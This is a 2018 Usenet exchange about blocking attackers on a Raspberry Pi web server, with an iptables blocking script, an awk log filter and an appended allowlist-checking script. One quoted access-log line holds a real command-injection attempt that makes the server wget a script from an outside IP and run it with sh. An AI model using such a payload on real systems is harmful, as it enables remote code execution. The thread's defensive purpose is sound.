On a sunny day (Thu, 21 Jun 2018 12:40:57 +0200) it happened Andreas Neumann
wrote in :
>Jan Panteltje wrote:
>
>> I have been watching traffic for a while now to the raspi server after I
>> posted the link, and see Russian and other countries hackers trying
>> things, looking for a way to cause havoc:
>> 31.207.194.8 - - [21/Jun/2018:10:45:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 499 "-" "Hello, World"
>
>This is what fail2ban was made for.
>
>No need to fiddle with iptables.
Interesting, I see:
https://www.fail2ban.org/wiki/index.php/Main_Page
about the same idea as my scripts do,
iptables is not that hard,
in fact I find it easy to use in scripting:
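/usr/local/sbin/ireject
#!/bin/sh
# this is called to add an input deny for an IP address to iptables,
# and save the configuration.
if [ "$1" = "" ]
then
    echo "Usage: ireject IP_address"
    exit 1
fi
# drop everything arriving from the address
iptables -A INPUT -s "$1" -p all -j DROP
# reject everything going to the address (OUTPUT has to match on the
# destination, -d; with -s the rule never matches traffic leaving this host)
iptables -A OUTPUT -d "$1" -p all -j REJECT
/usr/sbin/iptables-save > /root/firewall
exit 0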
then you can do something like:
tail -n 100 -f /var/log/apache2/access.log | awk '/cgi/{print $1}'
root@raspberrypi:~# tail -n 100 -f /var/log/apache2/access.log | awk '/cgi/{print $1}'
187.183.152.135
31.207.194.8
31.207.194.8
31.207.194.8
31.207.194.8
shows you everybody who tried the cgi thing,
then pipe it through sort 'unique', then ireject..... to add it to iptables
permanently
there are so many ways...
It's fun to write those scripts.
At startup do (automatically)
iptables-restore < /root/firewall
etc etc
These are just examples OK?
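Added example (not part of the original post): a batch version of the awk / sort / ireject pipeline described above that checks each logged client field is a real IPv4 address and honours an allowlist before printing the ireject calls. The ALLOWLIST contents, the function names and the sample log lines are constructed for illustration; ireject is the script from the post.

```shell
#!/bin/sh
# Added example, not from the original post. Prints a block plan; runs nothing.
ALLOWLIST="127.0.0.1 192.0.2.10"   # assumption: addresses that must never be blocked

# Succeed only for a dotted-quad IPv4 address with every octet in 0..255.
is_ipv4() {
    case "$1" in
        ""|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}

# Unique client fields of requests whose target (field 7 of the combined log
# format) mentions cgi; a "cgi" in the referrer or user agent does not count.
cgi_clients() {
    awk '$7 ~ /cgi/ { print $1 }' | sort -u
}

# One "ireject ADDRESS" line per client that is valid IPv4 and not allowlisted.
block_plan() {
    cgi_clients | while read -r ip; do
        is_ipv4 "$ip" || { printf 'skip (not IPv4): %s\n' "$ip" >&2; continue; }
        case " $ALLOWLIST " in
            *" $ip "*) printf 'skip (allowlisted): %s\n' "$ip" >&2; continue ;;
        esac
        printf 'ireject %s\n' "$ip"
    done
}

# Constructed sample log lines (documentation address ranges).
sample_log() {
    cat <<'EOF'
203.0.113.7 - - [21/Jun/2018:10:45:37 +0200] "GET /login.cgi?cli=aa HTTP/1.1" 404 499 "-" "Hello, World"
203.0.113.7 - - [21/Jun/2018:10:45:39 +0200] "GET /login.cgi?cli=bb HTTP/1.1" 404 499 "-" "Hello, World"
198.51.100.23 - - [21/Jun/2018:10:46:02 +0200] "GET /index.html HTTP/1.1" 200 1024 "http://example.org/cgi-faq" "Mozilla/5.0"
192.0.2.10 - - [21/Jun/2018:10:47:11 +0200] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "curl/7.52.1"
scanner.example.net - - [21/Jun/2018:10:48:30 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 499 "-" "-"
198.51.100.77 - - [21/Jun/2018:10:49:05 +0200] "GET /setup.cgi HTTP/1.1" 404 499 "-" "-"
EOF
}

sample_log | block_plan
```

Against the real log, run block_plan < /var/log/apache2/access.log and read the printed plan before executing any of it as root.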